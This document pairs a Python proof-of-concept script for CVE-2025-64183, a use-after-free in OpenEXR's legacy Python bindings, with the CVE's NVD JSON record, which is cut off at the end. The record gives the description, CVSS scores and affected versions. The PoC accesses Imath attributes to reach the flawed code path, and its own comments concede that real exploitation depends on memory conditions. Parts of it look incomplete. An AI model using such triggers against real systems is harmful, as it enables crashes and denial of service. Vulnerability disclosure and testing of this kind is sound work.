CVE-2025-64183

import OpenEXR import Imath import struct # 创建一个简单的PoC来触发use-after-free # 构造恶意EXR文件以触发PyObject_StealAttrString中的漏洞 def create_malicious_exr(): """ Create a malicious EXR file that triggers use-after-free in PyObject_StealAttrString when accessing specific attributes """ # OpenEXR file header with specific attributes that trigger # the vulnerable code path in PyObject_StealAttrString # The vulnerability occurs when accessing: # - PixelType.v attribute # - Box2i attributes # - V2f attributes file = OpenEXR.OutputFile('malicious.exr') # Accessing these attributes triggers the use-after-free: try: # This will trigger the vulnerable code path pixel_type = Imath.PixelType() # Accessing .v attribute calls PyObject_StealAttrString value = pixel_type.v # Triggers use-after-free except: pass # Example trigger code def trigger_vulnerability(): """ Code to trigger the use-after-free vulnerability by accessing attributes that call PyObject_StealAttrString """ import OpenEXR # Read a crafted EXR file exr_file = OpenEXR.InputFile('target.exr') # The header() access may trigger vulnerable code paths header = exr_file.header() # Access specific attributes that call PyObject_StealAttrString for key, value in header.items(): # Accessing .v, .min, .max, etc. on Imath types # triggers the vulnerable function if hasattr(value, 'v'): _ = value.v # Triggers use-after-free if hasattr(value, 'min'): _ = value.min if hasattr(value, 'max'): _ = value.max # Note: This PoC demonstrates the vulnerable code paths. # Actual exploitation requires specific memory conditions # and may vary based on Python/OpenEXR version and system. print('PoC for CVE-2025-64183: OpenEXR use-after-free in PyObject_StealAttrString')

{"cve": {"id": "CVE-2025-64183", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:37.323", "lastModified": "2025-12-08T16:00:58.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, there is a use-after-free in PyObject_StealAttrString of pyOpenEXR_old.cpp. The legacy adapter defines PyObject_StealAttrString that calls PyObject_GetAttrString to obtain a new reference, immediately decrefs it, and returns the pointer. Callers then pass this dangling pointer to APIs like PyLong_AsLong/PyFloat_AsDouble, resulting in a use-after-free. This is invoked in multiple places (e.g., reading PixelType.v, Box2i, V2f, etc.) Versions 3.2.5, 3.3.6, and 3.4.3 fix the issue."}, {"lang": "es", "value": "OpenEXR proporciona la especificación y la implementación de referencia del formato de archivo EXR, un formato de almacenamiento de imágenes para la industria cinematográfica. En las versiones 3.2.0 a 3.2.4, 3.3.0 a 3.3.5 y 3.4.0 a 3.4.2, existe un uso después de la liberación en PyObject_StealAttrString de pyOpenEXR_old.cpp. El adaptador heredado define PyObject_StealAttrString que llama a PyObject_GetAttrString para obtener una nueva referencia, la decrementa inmediatamente y devuelve el puntero. Los llamadores luego pasan este puntero colgante a APIs como PyLong_AsLong/PyFloat_AsDouble, lo que resulta en un uso después de liberación. Esto se invoca en múltiples lugares (por ejemplo, al leer PixelType.v, Box2i, V2f, etc.). Las versiones 3.2.5, 3.3.6 y 3.4.3 corrigen el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.5", "matchCriteriaId": "B39DE559-AB72-4C61-9E6B-E9125859D199"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L109-L115", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-57cw-j6vp-2 ... (truncated)